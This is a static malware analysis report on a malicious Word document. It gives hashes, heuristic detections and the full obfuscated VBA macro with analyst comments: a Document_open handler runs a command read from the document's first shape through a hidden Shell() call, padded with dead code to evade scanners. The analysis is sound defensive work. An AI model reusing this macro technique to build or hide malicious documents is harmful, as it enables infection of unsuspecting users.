Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 7262fb51c55d35b3…

MALICIOUS

Office (OLE)

Size: 70.9 KB · Created: 2018-11-12 14:19:00 · Authoring application: Microsoft Office Word · First seen: 2019-01-11
MD5: ba2b06b432c772e72af47a65a56c6ba4 SHA-1: e7acb9f48deb81cec8c37ebe4c696133a87704c6 SHA-256: 7262fb51c55d35b37d85c8b277f0ff4d5106997f353b80437481be493a3d29d7
272 Risk Score

Heuristics 9

  • ClamAV: Doc.Downloader.Generic-6747969-0 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Doc.Downloader.Generic-6747969-0
  • VBA macros detected medium 3 related findings OLE_VBA_MACROS
    Document contains VBA macro code
  • Potential Shell call in VBA critical OLE_VBA_SHELL
    Potential Shell call in VBA
    Matched line in script
        End If
    ELAkpZCQob = Shell(mBSvvFjS + iOQZcj + jKEDvU, LdqDBUl)
       If (acqcH <> 0 Or JvhWiVnJ) Then
  • VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXEC
    Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
  • Document_Open macro low OLE_VBA_DOCOPEN
    Document_Open macro
    Matched line in script
    End Function
    Private Sub Document_open()
       If (EljAoR <> 0 Or dCJjFwlI) Then
  • Suspicious cmd.exe invocation with execution flag high SC_STR_CMD
    Suspicious cmd.exe invocation with execution flag
  • Reference to PowerShell high SC_STR_POWERSHELL
    Reference to PowerShell
  • Suspicious extracted artifact info EXTRACTED_FILE_STATIC_TRIAGE
    One or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
  • Embedded URL info EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)

Extracted artifacts 1

Files carved from inside the sample during analysis.

Filename · Kind · Source · Size
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 4237 bytes
SHA-256: 3b823b818e923c636278e383d8e89ea21165a3deb2a0a379ef730de05f1c125d
Detection
ClamAV: No threats found
Obfuscation or payload: likely
44 of 81 identifiers look randomly generated (e.g. 'YEjjRbZnd') — consistent with name-mangling obfuscation.
Preview script
First 1,000 lines of the extracted script
' Module attributes recovered by olevba. VB_Base = "1Normal.ThisDocument" together with
' VB_PredeclaredId = True is the signature of the document's ThisDocument class module,
' which is why the Document_open handler further down is an auto-exec entry point rather
' than a macro the user has to run. There is no "Option Explicit" line in this module, so
' every name that is used without a Dim is an implicit Variant that starts out as Empty.
Attribute VB_Name = "zEpOGGHG"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
' Payload launcher. Invoked from Document_open below; takes no arguments and never
' assigns AVWQcovL, so its return value is Empty and is discarded by the caller.
'
' Only two statements in this function do anything observable:
'   1. mBSvvFjS = Shapes(1).TextFrame.TextRange.Text  - the command line is NOT in
'      the macro; it is read at runtime from the text of the first shape in the
'      document body. Any string-level analysis of the VBA alone will therefore miss
'      the actual command (the SC_STR_CMD / SC_STR_POWERSHELL hits in the report
'      presumably come from that shape text - confirm against the carved document).
'   2. Shell(mBSvvFjS + iOQZcj + jKEDvU, LdqDBUl)     - executes it with window
'      style 0 (vbHide), i.e. no console window is shown to the user.
'
' Every other statement is the same template repeated with random identifiers:
' "If (x <> 0 Or y) Then" over variables that are never assigned anywhere in the
' extracted source. With no Option Explicit they are Empty Variants, Empty compares
' equal to 0 and is False in a boolean context, so none of these branches appear to
' execute - they look like junk padding meant to defeat signature and heuristic
' scanners (NOTE(review): dead-code conclusion assumes nothing outside this module
' assigns those names; the extracted module is the only VBA stream listed).
Function AVWQcovL()
' 440641401 - 440641401 = 0 = vbHide: the Shell() window-style argument, obfuscated as
' an arithmetic expression so that a literal 0 (or "vbHide") never appears in source.
Const LdqDBUl = 440641401 - 440641401
   If (wOAXr <> 0 Or bEBYiAb) Then
        bEBYiAb = True
        UCcMiis = UCcMiis & CInt(wOAXr)
        If (wOAXr = 1) Then
            UCcMiis = UCcMiis & "mDDpoRCzp"
        Else
            UCcMiis = UCcMiis & "UubzREuJ"
        End If
    End If
   If (aHCQRjK <> 0 Or RfbfRwbz) Then
        RfbfRwbz = True
        BiKBCi = BiKBCi & Atn(aHCQRjK)
        If (aHCQRjK = 1) Then
            BiKBCi = BiKBCi & "fhzWlYRVD"
        Else
            BiKBCi = BiKBCi & "YfAnYE"
        End If
    End If
   If (wjUEwKh <> 0 Or cSlTiwv) Then
        cSlTiwv = True
        thsiDYLRc = thsiDYLRc & CInt(wjUEwKh)
        If (wjUEwKh = 1) Then
            thsiDYLRc = thsiDYLRc & "fCicfhQs"
        Else
            thsiDYLRc = thsiDYLRc & "irtrG"
        End If
    End If
' Real work #1: command string is fetched from the document's first shape, not the VBA.
mBSvvFjS = Shapes(1).TextFrame.TextRange.Text
   If (kAGqCoST <> 0 Or owDOYG) Then
        owDOYG = True
        XEOzNpE = XEOzNpE & CInt(kAGqCoST)
        If (kAGqCoST = 1) Then
            XEOzNpE = XEOzNpE & "avfTnlFoL"
        Else
            XEOzNpE = XEOzNpE & "TXqFdpKk"
        End If
    End If
   If (cfbfLau <> 0 Or KzYuvGQH) Then
        KzYuvGQH = True
        zfZjH = zfZjH & CInt(cfbfLau)
        If (cfbfLau = 1) Then
            zfZjH = zfZjH & "YEjjRbZnd"
        Else
            zfZjH = zfZjH & "ZXvUzH"
        End If
    End If
   If (KJpciWTk <> 0 Or aRdYYJkjl) Then
        aRdYYJkjl = True
        DtNGbEXw = DtNGbEXw & CDbl(KJpciWTk)
        If (KJpciWTk = 1) Then
            DtNGbEXw = DtNGbEXw & "jddDnUYjp"
        Else
            DtNGbEXw = DtNGbEXw & "SARnZ"
        End If
    End If
' Real work #2: hidden Shell() of the shape text. iOQZcj and jKEDvU are never assigned
' in this module, so they are presumably Empty and contribute nothing to the command
' (confirm in a sandbox trace). The return value (process id) is stored and never used.
ELAkpZCQob = Shell(mBSvvFjS + iOQZcj + jKEDvU, LdqDBUl)
   If (acqcH <> 0 Or JvhWiVnJ) Then
        JvhWiVnJ = True
        ShMdcIfHz = ShMdcIfHz & CByte(acqcH)
        If (acqcH = 1) Then
            ShMdcIfHz = ShMdcIfHz & "FscYJdC"
        Else
            ShMdcIfHz = ShMdcIfHz & "RYiWO"
        End If
    End If
   If (EVsFBUiWS <> 0 Or VjrLuvVq) Then
        VjrLuvVq = True
        CshWXsjOV = CshWXsjOV & CDbl(EVsFBUiWS)
        If (EVsFBUiWS = 1) Then
            CshWXsjOV = CshWXsjOV & "NvSzkXnm"
        Else
            CshWXsjOV = CshWXsjOV & "wIWVK"
        End If
    End If
   If (uLvXcJfO <> 0 Or AXwVNU) Then
        AXwVNU = True
        NlEqC = NlEqC & CDbl(uLvXcJfO)
        If (uLvXcJfO = 1) Then
            NlEqC = NlEqC & "HnHJTsrf"
        Else
            NlEqC = NlEqC & "XkjwUSz"
        End If
    End If
End Function
' Auto-exec entry point: Word runs Document_open in ThisDocument as soon as the
' document is opened with macros enabled, without any further user action.
' The only statement that matters is the bare call to AVWQcovL, which reads the
' command from the first shape and runs it through a hidden Shell(). The four
' "If (x <> 0 Or y)" blocks around it use the same never-assigned Variant pattern
' as AVWQcovL and appear to be dead padding (assumes no other module assigns
' these names - this is the only VBA stream that was extracted).
' For detection purposes the useful signals are: the auto-exec name itself, the
' Shell() call in the callee, and the fact that the executable payload lives in
' document body text rather than in the macro stream.
Private Sub Document_open()
   If (EljAoR <> 0 Or dCJjFwlI) Then
        dCJjFwlI = True
        IQTpn = IQTpn & CInt(EljAoR)
        If (EljAoR = 1) Then
            IQTpn = IQTpn & "jizNlOA"
        Else
            IQTpn = IQTpn & "PdAZwAXn"
        End If
    End If
   If (fOpWmSowp <> 0 Or JhoOdj) Then
        JhoOdj = True
        FAbfZ = FAbfZ & Atn(fOpWmSowp)
        If (fOpWmSowp = 1) Then
            FAbfZ = FAbfZ & "OuGEWmH"
        Else
            FAbfZ = FAbfZ & "VwbKYhKr"
        End If
    End If
   If (nYjiiom <> 0 Or RwRmrMGkb) Then
        RwRmrMGkb = True
        jNSMhjo = jNSMhjo & CByte(nYjiiom)
        If (nYjiiom = 1) Then
            jNSMhjo = jNSMhjo & "NEEwtOSC"
        Else
            jNSMhjo = jNSMhjo & "AukMRSZUL"
        End If
    End If
' The actual trigger: hands off to the launcher above; its return value is ignored.
AVWQcovL
   If (PDnGi <> 0 Or UHbrzp) Then
        UHbrzp = True
        bhrTCDTpT = bhrTCDTpT & CInt(PDnGi)
        If (PDnGi = 1) Then
            bhrTCDTpT = bhrTCDTpT & "qrPOu"
        Else
            bhrTCDTpT = bhrTCDTpT & "rWUFbwAQs"
        End If
    End If
   If (wuRJu <> 0 Or NqlhBJLPS) Then
        NqlhBJLPS = True
        wwPSzaOjU = wwPSzaOjU & CInt(wuRJu)
        If (wuRJu = 1) Then
            wwPSzaOjU = wwPSzaOjU & "kWchaarB"
        Else
            wwPSzaOjU = wwPSzaOjU & "uCwwwCX"
        End If
    End If
End Sub